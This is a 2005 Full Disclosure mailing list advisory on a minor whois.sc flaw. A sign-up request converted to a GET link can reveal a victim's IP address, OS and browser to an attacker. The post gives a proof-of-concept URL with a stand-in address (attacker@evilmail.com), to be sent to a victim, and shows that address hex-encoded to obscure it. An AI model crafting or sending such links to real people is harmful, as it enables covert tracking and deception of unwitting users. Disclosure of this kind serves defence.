Full Disclosure mailing list archives
whois.sc not-big-deal hole
From: unknown unknown <unknown.pentester () gmail com>
Date: Wed, 2 Nov 2005 16:53:20 +0000
Title: whois.sc not-big-deal hole Server-side risk: none Client-side risk: low risk (private info revealed about the user) Description: This might not even be considered a proper security hole, but I thought it's an interesting way to get the following information about a user: - IP Address - Operating system - Web browser version This information can be easily obtained by "tricking" someone to visit your website and then checking the webserver logs. Email headers also help, not to mention loud OS detection tools such as xprobe2 and nmap (which will only work if you're lucky and the "victim" doesn't use a firewall blocking all incoming traffic). In this case however, the scenario is a little different because we use a sign-up service provided by an existing website for our own purposes (enumeration). The only limitation of this "trick" is that the attacker needs to use a different email address for each attack. This is because whois.sc will set the account activation status to "pending" after requesting the account activation with your email address for the first time. The original request to sign-up for an account is a POST request *similar* to the following: POST http://www.whois.sc/members/process.html HTTP/1.1 Host: www.whois.sc Content-Length: 48 action=newaccount&doneurl=&email=test%40test.com However we can change the request from POST to GET and the application will happily process the query: http://www.whois.sc/members/process.html?action=newaccount&doneurl=%252Freverse-ip%252F&email=test%40test.com PoC: http://www.whois.sc/members/process.html?action=newaccount&doneurl=%252Freverse-ip%252F&email=attacker%40evilmail.com Replace "attacker%40evilmail.com" in the previous link with your own email address (e.g.: myself%40gmail.com) and send it to the "victim". Also, we could obsfucate our email address by encoding it to hex: http://www.whois.sc/members/process.html?action=newaccount&doneurl=%252Freverse-ip%252F&email=%61%74%74%61%63%6B%65%72%40%65%76%69%6C%6D%61%69%6C%2E%63%6F%6D Note: "%40" is "@" in hex. For a good resource to convert strings to different encodings check out http://www.thedumbterminal.co.uk/php/stringdecode.php Regards, pagvac Earth, SOLAR SYSTEM _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- whois.sc not-big-deal hole unknown unknown (Nov 02)